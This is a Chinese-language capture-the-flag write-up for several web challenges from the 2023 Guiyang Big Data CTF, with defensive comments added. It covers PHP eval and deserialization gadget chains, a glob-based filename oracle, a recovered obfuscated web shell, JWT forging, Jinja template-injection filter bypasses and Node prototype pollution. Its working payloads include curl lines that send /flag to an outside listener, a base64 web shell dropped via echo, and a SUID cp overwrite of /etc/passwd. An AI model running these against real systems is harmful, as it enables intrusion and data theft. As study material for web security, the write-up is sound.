2023 贵阳大数据 CTF 部分题解

摸一下。

仔细ping

/?ip=nl%20flag.php

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Ping吗!</title>


</br><pre> 1 <?php

2 $flag = "flag{CAmbVbbBafY6k3tRybmqvqvWJYg8ms7s}";
3 ?>
</pre>

</center>

May_be

<?php
// CTF challenge source ("May_be"): an eval() sink reachable from ?a=, gated by two regex
// checks. Kept here for analysis of why the gates are insufficient, not as a pattern to copy.
highlight_file(__FILE__);
$a = $_GET['a'];
// [^\W]+ is just \w+; (?R) recurses the whole pattern, so this strips nested argument-less
// calls of the form f(g(h())) and only input that reduces to a single ';' passes the gate.
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $a)) {
// Case-insensitive denylist of function-name fragments. A denylist in front of eval() is
// never sufficient: any unlisted callable chain still executes.
if (!preg_match("/sess|ion|head|ers|file|na|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i",$a)){
// Code execution on user-controlled input; the only real mitigation is not to eval() it.
eval($a);
}else{
die("May be you should bypass.");
}
}else{
die("nonono");
}
?>
http://39.107.68.43:35894/?a=eval(array_pop(next(get_defined_vars())));
1=system('ls /');
bin boot dev etc home lib lib64 media mnt opt proc pushflag.sh root run sbin srv start.sh sys tmp usr var
#flag单独写在某个文件中 #!/bin/bash echo $1 > /.ffffffIIIIIII44444444444gggg
1=system('find / -user root -perm -4000 -exec ls -ldb {} \;');
-rwsr-xr-x 1 root root 151168 Sep 24  2020 /bin/cp
-rwsr-xr-x 1 root root 55528 Jan 20 2022 /bin/mount
-rwsr-xr-x 1 root root 71912 Jan 20 2022 /bin/su
-rwsr-xr-x 1 root root 35040 Jan 20 2022 /bin/umount
-rwsr-xr-x 1 root root 58416 Feb 7 2020 /usr/bin/chfn
-rwsr-xr-x 1 root root 52880 Feb 7 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 88304 Feb 7 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44632 Feb 7 2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63960 Feb 7 2020 /usr/bin/passwd
1=system('echo "PD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWzFdKTs=" | base64 -d > 1.php');
root2::0:0::/root:/bin/bash
(www-data:/tmp) $ cp /tmp/passwd /etc/passwd
(www-data:/tmp) $ su root2 -c "/.ffffffIIIIIII44444444444gggg"
/.ffffffIIIIIII44444444444gggg: line 1: flag{mhbFHhwweJj4QuhveSQTsYXUCscvMbNd}: command not found

notrce

l''s | cu''rl -d @- -X POST http://175.178.111.34:7777

pop

<?php
// CTF challenge source ("pop"): three gadget classes followed by unserialize() of user input.
highlight_file(__FILE__);
class TT{
// Gadget: __destruct echoes $key, so a non-string $key has its __toString() invoked.
public $key;
public $c;
public function __destruct(){
// echo on an object calls __toString — the entry point of the chain in this challenge.
echo $this->key;
}

public function __toString(){
return "welcome";
}
}

class JJ{
// Gadget: __toString calls $obj as a function, so an object defining __invoke() is reached here.
public $obj;
public function __toString(){
// ($this->obj)() on an object runs its __invoke().
($this -> obj)();
return "1";
}
public function evil($c){
eval($c);
}
public function __sleep(){
phpinfo();
}
}

class MM{
// Gadget: __invoke calls $name($c) with both values taken from the deserialized object,
// i.e. an arbitrary function call with an attacker-chosen argument.
public $name;
public $c;
public function __invoke(){
// Dynamic call on a user-supplied callable name; this is where code execution happens.
($this->name)($this->c);
}
public function __toString(){
return "ok,but wrong";
}
public function __call($a, $b){
echo "Hacker!";
}
}
// Root cause: unserialize() of untrusted input instantiates any declared class and lets
// its magic methods (__destruct, __toString, __invoke) run. Use json_decode() for data,
// or at least unserialize($s, ['allowed_classes' => false]).
$a = unserialize($_GET['bbb']);
// Throwing afterwards does not prevent TT::__destruct() from running when $a is released
// at shutdown — the chain in this writeup depends on exactly that.
throw new Error("NoNoNo");

Fatal error: Uncaught Error: NoNoNo in /var/www/html/index.php:43 Stack trace: #0 {main} thrown in /var/www/html/index.php on line 43

在 MM 类的 __invoke 函数里 getshell，需要把 MM 当函数调用：JJ 的 __toString 把 $this->obj 当函数调用了，而 TT 的 __destruct 把 $this->key 当字符串用（echo 触发 __toString）。

<?php

class TT{
// Stub of the target's TT: properties only, so no magic method runs while building the payload.
public $key;
public $c;

}
class JJ{
// Stub of the target's JJ; only $obj is needed in the serialized form.
public $obj;

}
class MM{
// Stub of the target's MM; $name/$c become the callable and its argument on the target.
public $name;
public $c;

}

// Chain: TT->key = JJ, JJ->obj = MM, MM->name/c — matching the order of magic methods
// the target's classes invoke (__destruct -> __toString -> __invoke).
$c = new MM();
$c->name = "system";
$c->c = "cat /flag";

$b = new JJ();
$b -> obj = $c;

$a = new TT();
$a->key = $b;


// NOTE(review): $arr is never assigned in this script (undefined-variable notice, empty
// output); the serialized string used in the writeup corresponds to serialize($a).
echo serialize($arr);

throw new Error("NoNoNo");

http://123.56.174.142:52862/?bbb=O:2:%22TT%22:2:{s:3:%22key%22;O:2:%22JJ%22:1:{s:3:%22obj%22;O:2:%22MM%22:2:{s:4:%22name%22;s:6:%22system%22;s:1:%22c%22;s:9:%22cat%20/flag%22;}}s:1:%22c%22;N;
flag{ftJmMSTRfrtuYvNrXyndyMT9vnX4hGhr}

Hackerconfused

<?php
// CTF challenge source ("Hackerconfused"). Notices are suppressed, which also hides the
// undefined-variable bug in Funny::__destruct() further down.
error_reporting(0);
// Global read gate consulted by Funny::__destruct(); only Fun::__toString() sets it to true.
$CanRead = false;
class SFile{
// Wraps a path; __toString reports whether scandir() on it finds any entries.
public $name;
public function __construct($name) {
$this->name = $name;
}
public function __toString(){
// $name reaches scandir() unvalidated, so stream wrappers such as glob:// are accepted.
// The two distinct replies form a yes/no oracle about the filesystem — the leak the
// brute-force script in this writeup relies on; a constant reply would remove it.
$num = count(scandir($this->name));
if($num > 0){
return 'Not null';
} else {
return 'Access the backdoor_******.php.* in [0-f]';
}
}
}
class Funny{
// Holds a file name; the constructor refuses names containing "backdoor".
public $name;
public function __construct($name){
// strstr() on an object argument first converts it via that object's __toString().
if(strstr($name, 'backdoor')===false){
$this->name = $name;
}else{
$this->name = 'nohint.txt';
}
}
public function __toString(){
return $this->name;
}

public function __destruct(){
global $CanRead;
// BUG: $name is an undefined local here (the check was meant for $this->name), so this
// guard never fires and a deserialized Funny carrying any name passes it.
if(strstr($name, 'backdoor')!==false){
die('try again');
}
// Arbitrary file read once the global is set; $this->name also accepts php:// wrappers.
if($CanRead){
echo(file_get_contents($this->name));
}
}
}
class Fun{
public $secret = 'nohint.txt';
public function __wakeup(){
// Runs on unserialize(); echo of an object $secret invokes its __toString().
echo $this->secret;
}

public function __toString(){
global $CanRead;
// Flips the global read gate, then builds a temporary Funny whose __destruct()
// (now with $CanRead true) runs as soon as this expression finishes.
$CanRead = true;
return (new Funny($this->secret))->name;
}
}

// Untrusted deserialization: ?p= is base64-decoded and handed to unserialize(), which builds
// any of the classes above and runs their __wakeup/__destruct. Prefer json_decode(), or at
// least unserialize($s, ['allowed_classes' => false]).
if(isset($_GET['p'])){
unserialize(base64_decode($_GET['p']));
}else{
show_source(__FILE__);
}
<?php
class SFile{
// Stub of the target's SFile: property and constructor only, no __toString, so nothing
// runs locally while the payload is built.
public $name ;
public function __construct($name) {
$this->name = $name;
}
}
class Funny{
// Stub of the target's Funny (declared for completeness; unused by this generator).
public $name;
}
class Fun{
// Stub of the target's Fun; $secret carries the SFile probe.
public $secret;
}
// Local helper: takes the probe path from ?path= (supplied by the brute-force script in this
// writeup) and emits a Fun whose $secret is an SFile, encoded the way the target's ?p= expects.
$path = $_GET["path"];
$fun = new Fun();
$fun->secret = new SFile($path);
echo urlencode(base64_encode(serialize($fun)));
import requests

# Recovers the hidden file name one character at a time using the target's SFile::__toString()
# as a yes/no oracle ("Not null" when the glob:// pattern matches at least one entry).
# From a defender's view the distinguishing reply is the leak; identical replies for hit and
# miss would remove the oracle. get_payload_url is the local helper that builds the payload.
path = "glob://./backdoor_"
get_payload_url = "http://127.0.0.1:7777/2023/gz/no.php"
exp_url = "http://47.93.30.67:38017/"
# Candidate characters: hex digits plus ".ph" so the file extension can be matched as well.
dic = "1234567890abcdef.ph"

flag = True
while flag:
    flag = False
    for i in dic:
        r = requests.get(url=get_payload_url, params={"path": path + i + "*"})
        p = r.text
        r = requests.get(url=exp_url, params={"p": p})
        if r.text == "Not null":
            # Extend the known prefix and restart the scan for the next character.
            path = path + i
            flag = True
            print(path)
            break
# glob://./backdoor_a5f9d3.php
<?php
class Funny{
// Stub carrying the file to read; the php://filter wrapper returns the PHP source base64-encoded
// as plain text, which the decode script later in this writeup consumes.
public $name = "php://filter/convert.base64-encode/resource=backdoor_a5f9d3.php";
}
class Fun{
// Stub of the target's Fun; $secret is nested to drive __wakeup -> __toString on the target.
public $secret;
}

// Two nested Fun objects: the outer one's __wakeup echoes the inner one, whose __toString
// sets $CanRead and constructs a Funny from this Funny — the chain the target's
// Hackerconfused source exposes. The commented line was a local dry run.
$fun = new Fun();
$fun2 = new Fun();
$fun->secret = new Funny();
$fun2->secret = $fun;
//unserialize(serialize($fun2));
echo urlencode(base64_encode(serialize($fun2)));
http://47.93.30.67:38017/?p=TzozOiJGdW4iOjE6e3M6Njoic2VjcmV0IjtPOjM6IkZ1biI6MTp7czo2OiJzZWNyZXQiO086NToiRnVubnkiOjE6e3M6NDoibmFtZSI7czo2MzoicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT1iYWNrZG9vcl9hNWY5ZDMucGhwIjt9fX0%3D
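import base64
import os

# Peels nested eval(base64_decode(...)) layers out of a captured PHP file for analysis.
# "1" holds the base64 text retrieved from the target; each round rewrites the layer file
# so the outermost layer prints the next one instead of executing it, runs it through the
# local PHP CLI, and repeats until PHP reports an error (no further layer to print).
PHP_BIN = "/Applications/MAMP/bin/php/php8.2.0/bin/php"
LAYER_FILE = "1.php"


def decode_first_layer(encoded: str) -> bytes:
    """Base64-decode the captured source and turn its eval() into print_r().

    With print_r in place the first run emits the decoded inner layer rather than
    executing it. Raises binascii.Error on malformed base64.
    """
    return base64.b64decode(encoded).replace(b"eval", b"print_r")


def rewrite_layer(output: str) -> str:
    """Build the next layer file from the previous run's output.

    The output is expected to begin with 'eval'; those four bytes are dropped and
    '<?php echo' is prefixed so the next run prints the layer's argument.
    """
    return "<?php echo" + output[4:]


def write_layer(text: str) -> None:
    """Overwrite the layer file and close it so the PHP CLI sees the full content.

    The original kept the handle open (and unflushed) while invoking PHP, which could
    run against a partially written or empty file.
    """
    with open(LAYER_FILE, "w") as layer:
        layer.write(text)


def main() -> None:
    """Drive the decode loop; prints each recovered layer and its length."""
    with open("1") as captured:
        write_layer(decode_first_layer(captured.read()).decode())

    while True:
        with os.popen(PHP_BIN + " " + LAYER_FILE) as proc:
            r = proc.read().strip()
        print(len(r))
        # PHP reports an error once the innermost layer is reached. Unlike the original,
        # the last layer is left on disk here rather than truncated before the check.
        if "error" in r:
            break
        write_layer(rewrite_layer(r))
        print(r)


if __name__ == "__main__":
    main()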




<?php 
// Obfuscated web shell recovered from the challenge ("backdoor_*.php"), documented for
// analysis only: a system() sink keyed on a hidden GET parameter name. Detection hint for
// defenders: base64_decode() output flowing into system() behind an odd parameter name.
$erzo_f851f55b = [base64_decode('ZmxhZ3sjX2FiY2RlZn0='), base64_decode('ZmxhZ3tiMHdfYjB3fQ=='), base64_decode('ZmxhZ3t0ZXRfZmxhZ30='), base64_decode('ZmxhZ3s5OSF6elN3Y30='), base64_decode('ZmxhZ3tkZWJ1R19mdHd9'), base64_decode('ZmxhZ3toZWxsX3llYWh9'), base64_decode('ZmxhZ3t0NHN0fQ==')];
$igxc_9ce88802 = '';
$bbmg_1b267619 = 0;
// Builds the parameter name by taking character i of decoded string i and prepending it;
// with these seven strings that yields "4h{galf" (the ?4h{galf= requests in this writeup).
foreach ($erzo_f851f55b as &$djkg_417c4fa3) {
$igxc_9ce88802 = $djkg_417c4fa3[$bbmg_1b267619] . $igxc_9ce88802;
$bbmg_1b267619++;
};
// NOTE: the by-reference loop variable is never unset() — a dangling-reference hazard.
if (isset($_GET[$igxc_9ce88802])) {
$grxe_fd6b6fc9 = $_GET[$igxc_9ce88802];
// The value is base64; the first and last five bytes are discarded as padding and the
// remainder is echoed and then executed.
$pgck_32cfe6c1 = base64_decode($grxe_fd6b6fc9);
$jipp_8a561003 = substr($pgck_32cfe6c1, 5, -5);
echo $jipp_8a561003;
system($jipp_8a561003);
} else {
// Prints "404" to look like a missing page when the parameter is absent.
echo base64_decode('NDA0');
};
http://47.93.30.67:38017/backdoor_a5f9d3.php?4h{galf=YWFhYWFscyAvYWFhYWE=
/readflagUsage: /readflag give me the flag
http://47.93.30.67:38017/backdoor_a5f9d3.php?4h{galf=YWFhYWEvcmVhZGZsYWcgZ2l2ZSBtZSB0aGUgZmxhZ2FhYWFh
/readflag give me the flagflag{cQfGDnSt85Mxkua2u9hxSeshES8sK2s8}
#include <stdio.h>
#include <string.h>
#include <unistd.h>

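/*
 * Challenge helper (/readflag): prints /flag when invoked with the exact phrase
 * "give me the flag". Meant to run setuid-root; the set*id calls drop the saved
 * unprivileged ids so the fopen() below runs as root.
 */
int main(int argc, char *argv[]) {
    seteuid(0);
    setegid(0);
    setuid(0);
    setgid(0);

    if (argc < 5) {
        printf("Usage: %s give me the flag\n", argv[0]);
        return 1;
    }

    /* Logical OR on the four comparisons; same truth table as the original bitwise OR of
     * strcmp() results, but without relying on how those values combine. */
    if (strcmp(argv[1], "give") != 0 || strcmp(argv[2], "me") != 0 ||
        strcmp(argv[3], "the") != 0 || strcmp(argv[4], "flag") != 0) {
        puts("You are not worthy");
        return 1;
    }

    char flag[256] = { 0 };
    FILE *fp = fopen("/flag", "r");
    if (!fp) {
        perror("fopen");
        return 1;
    }
    /* fread() returns size_t, so the original "< 0" test could never fire; use ferror()
     * instead. Read at most sizeof(flag) - 1 bytes so the buffer stays NUL-terminated
     * for puts() even when the file is 256 bytes or longer. */
    size_t n = fread(flag, 1, sizeof(flag) - 1, fp);
    if (n == 0 && ferror(fp)) {
        perror("fread");
        fclose(fp);
        return 1;
    }
    flag[n] = '\0';
    puts(flag);
    fclose(fp);
    return 0;
}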

完美网站

curl http://39.107.27.191:21600/\?img\=dHVwaWFuLnBuZw\=\=
别重定向了,赶快让我(?n=30-10,以内的数值。)-_-<br />
<b>Notice</b>: Undefined index: n in <b>/var/www/html/index.php</b> on line <b>11</b><br />

固定n爆破拿到图片,尾部ffffpq.php。

不太喜欢flask的开发

GET / HTTP/1.1
Host: 123.56.175.221:48127
Cache-Control: max-age=0
Authorization: Basic dG9tY2F0OnRvbWNhdA==
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,ja;q=0.6
Connection: close


HTTP/1.1 200 OK
Server: Werkzeug/2.2.3 Python/3.10.1
Date: Fri, 28 Apr 2023 14:37:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 115
Connection: close

you are not our client,please guess our SECRET_KEY and Generating cookies using keys ,then view /search?flag=*****
GET /search?flag=***** HTTP/1.1
Host: 123.56.175.221:48127
Cache-Control: max-age=0
Authorization: Basic dG9tY2F0OnRvbWNhdA==
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,ja;q=0.6
Connection: close


HTTP/1.1 401 UNAUTHORIZED
Server: Werkzeug/2.2.3 Python/3.10.1
Date: Fri, 28 Apr 2023 14:39:32 GMT
Content-Type: application/json
Content-Length: 49
Connection: close

{"msg":"Missing cookie \"access_token_cookie\""}

JWT 用 HS256 签名，密钥是 tomcat（即 Basic 认证的口令）。

{
"sub": "admin"
}
# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.p7j5Fnbpfmw45f43J0ZkFs_JXs1h_rRozLAZEjsbdVM
GET /search?flag={{config}} HTTP/1.1
Host: 123.56.175.221:48127
Cache-Control: max-age=0
Authorization: Basic dG9tY2F0OnRvbWNhdA==
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,ja;q=0.6
Cookie: access_token_cookie=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.p7j5Fnbpfmw45f43J0ZkFs_JXs1h_rRozLAZEjsbdVM
Connection: close


提示flag{the_flag_in_the_source_code}

GET /search?flag={{lipsum["\x5f\x5fglobals\x5f\x5f"]["\x6fs"]["popen"]("tac+app\x2epy")["rea\x64"]()}} HTTP/1.1
Host: 123.56.175.221:48127
Cache-Control: max-age=0
Authorization: Basic dG9tY2F0OnRvbWNhdA==
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,ja;q=0.6
Cookie: access_token_cookie=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.p7j5Fnbpfmw45f43J0ZkFs_JXs1h_rRozLAZEjsbdVM
Connection: close


flag{SsTi_IS_InTerEstinG!!!!!}

JUST_PROTO

const express = require('express');
const { exec } = require("child_process");
const app = express();
app.get('/', (req, res) => res.send('嗨嗨嗨!!老八来了!!!'));

// CTF challenge source ("JUST_PROTO"): a per-token key/value store. `ba` holds helpers
// only — it never defines redis_set, which /bkup reads below.
let ba = {
baba: (token)=>{ return !!token },
// Size cap on the store: wipes it once its JSON form exceeds 10000 bytes.
bababa: ()=>{ if (JSON.stringify(date).length > 10000) date = {} },
// set: `redis-cli -h ${ba.redis_host} set `
// get: `redis-cli -h ${ba.redis_host} get `
};

let date = {};

app.get('/set', (req, res) => {
ba.bababa();
const {token, key, val} = req.query;
if (!ba.baba(token) || !val) return res.send("wrong");
// Nothing ever creates date[token] for a fresh token, so this throws for ordinary
// tokens. For token=__proto__, date[token] is Object.prototype and the write becomes a
// prototype-pollution primitive: any object lacking `key` then reports val for it,
// including ba.redis_set in /bkup. Mitigation: keep the store in Object.create(null) or
// a Map, reject "__proto__"/"constructor"/"prototype" as names, write own properties only.
date[token][key] = val;
res.json({ is_succ: true })
});

app.get('/get', (req, res) => {
const {token, key} = req.query;
if (!ba.baba(token)) return res.send("wrong");
// Reads follow the same prototype chain, so polluted values are readable back here too.
let result = date[token];
if (result) result = result[key];
res.json({ result: result === undefined ? "null" : result, is_succ: result !== undefined })
});


app.put('/bkup', (req, res) => {
let date_stream = Buffer.from(JSON.stringify(date));
// Shell command assembled from a property that is undefined on `ba` itself — after
// pollution it is whatever /set stored. Use execFile() with an argument array rather than
// exec() on a concatenated string, and never source command text from mutable objects.
const cmd = ba.redis_set + `date ${date_stream.toString('base64')}`;
exec(cmd, (err,_,__) => {
if (err) return res.json({ is_succ: false });
res.json({ is_succ: true });
});
});

app.listen(8080, () => console.log(`嗨嗨嗨!!老八来了!!!`));


//没敢吧所有变量名换成bababa 怕被打

http://39.106.154.70:26132/set?token=__proto__&key=redis_set&val=curl%20-F%20%22x=@/flag%22%20-X%20POST%20http://175.178.111.34:7777
(base) ubuntu@VM-8-15-ubuntu:~$ nc -lvvp 7777
Listening on 0.0.0.0 7777
Connection received on 39.107.243.76 11515
POST / HTTP/1.1
Host: 175.178.111.34:7777
User-Agent: curl/7.52.1
Accept: */*
Content-Length: 232
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------d021bc79c8a15513

--------------------------d021bc79c8a15513
Content-Disposition: form-data; name="x"; filename="flag"
Content-Type: application/octet-stream

flag{MbkFk47Rxcn3eJFRt2CmwxxWsWQw2VGa}

--------------------------d021bc79c8a15513--
{% set po=dict(po=a,p=a)|join%}{% set a=(()|select|string|list)|attr(po)(24)%}{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}{% set chr=x.chr%}{% set cmd=()%}{%if x.eval(cmd)%}aaa{%endif%}
import re

import requests

# Fetches a response from the local helper (no.php) for the given cmd text. The helper is
# not shown in this writeup; judging by the \d{2,3} parsing below it presumably returns the
# character codes of cmd — confirm against no.php. Note `str` shadows the builtin; rename
# (e.g. `raw`) if this script is reused.
str = requests.get(
    "http://127.0.0.1:7777/2023/gz/no.php?cmd=" + 'cat /f1ag_g4lfcdecddefewfebge /|curl -d @- -X POST http://175.178.111.34:7777').text
result = ""


def half2full(half: str) -> str:
    """Map printable ASCII (0x21-0x7E) to its fullwidth form and space to U+3000.

    Characters outside that range are passed through unchanged. The writeup applies
    this to digit strings before splicing them into chr(...) calls; the reason is not
    stated in this script — presumably the target's template engine accepts Unicode
    digits where ASCII ones would be caught by its denylist. Confirm before relying on it.
    """
    full = ''
    for ch in half:
        if ord(ch) in range(33, 127):
            # Fullwidth forms sit at a fixed offset of 0xFEE0 from ASCII.
            ch = chr(ord(ch) + 0xfee0)
        elif ord(ch) == 32:
            ch = chr(0x3000)
        else:
            pass
        full += ch
    return full


# Turns each 2-3 digit code in the response into a chr(...) call, joined with Jinja's '~'
# string-concatenation operator, then splices the result into the template payload.
# '\d' in a non-raw string is an invalid escape (DeprecationWarning); prefer r'\d{2,3}'.
for i in re.findall('\d{2,3}', str):
    result += "chr(" + half2full(i) + ")~"
    # print(i)
print(result[:-1])

res = "{% set po=dict(po=a,p=a)|join%}{% set a=(()|select|string|list)|attr(po)(24)%}{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}{% set chr=x.chr%}{% set cmd=(" + result[:-1] + ")%}{%if x.eval(cmd)%}aaa{%endif%}"
url = "http://39.107.82.169:63151/?miniID=" + res
requests.get(url=url)

(base) ubuntu@VM-8-15-ubuntu:~$ nc -lvvp 7777
Listening on 0.0.0.0 7777
Connection received on 39.107.243.76 31879
POST / HTTP/1.1
Host: 175.178.111.34:7777
User-Agent: curl/7.64.0
Accept: */*
Content-Length: 38
Content-Type: application/x-www-form-urlencoded

flag{GCqYdG6x8Dt7Q3rvQfWuvx28UxC9Ctrx}
from flask import Flask,render_template,request,render_template_string
# CTF challenge source for the Flask task in this writeup; the app object is module-level.
app = Flask(__name__)

@app.route('/',methods = ['POST','GET'])
def index():
    # The miniID query parameter is interpolated into the template *source* before
    # rendering, which is server-side template injection. The fix is to keep user data
    # out of the template text entirely: render_template_string(html, id=id) with a
    # '{{ id }}' placeholder, so the value is rendered as data, not parsed as a template.
    def safe_jinja(m):
        # Denylist applied to the finished template text. The while/else/break wrapper
        # runs at most once per token, so this is equivalent to a plain `if n in m: return`.
        # A denylist is not a substitute for keeping data out of the template (the payload
        # in this writeup gets past it).
        forbidden = ['[','{{','_','class','+','popen','*','import','request']
        for n in forbidden:
            while True:
                if n in m:
                    return "Forbidden!!!"
                else:
                    break
        return m
    # `id` shadows the builtin; None when the parameter is absent (renders as "None").
    id = request.args.get('miniID')
    html = '''
<h2 align="center">it's time.Show me your documents,please.</h2>
<h2 align="center">I will GET your miniID.</h2>
<h2 align="center">%s</h2>
'''%(id)
    html = safe_jinja(html)
    return render_template_string(html)
if __name__ == '__main__':
    # Listens on all interfaces on port 80; debug mode is not enabled here.
    app.run(host='0.0.0.0',port=80)

https://cloud.tencent.com/developer/article/2238031?areaSource=&traceId=

https://yagsheg.com/2021/05/08/SUID-%E6%8F%90%E6%9D%83%E5%B0%8F%E8%AE%B0/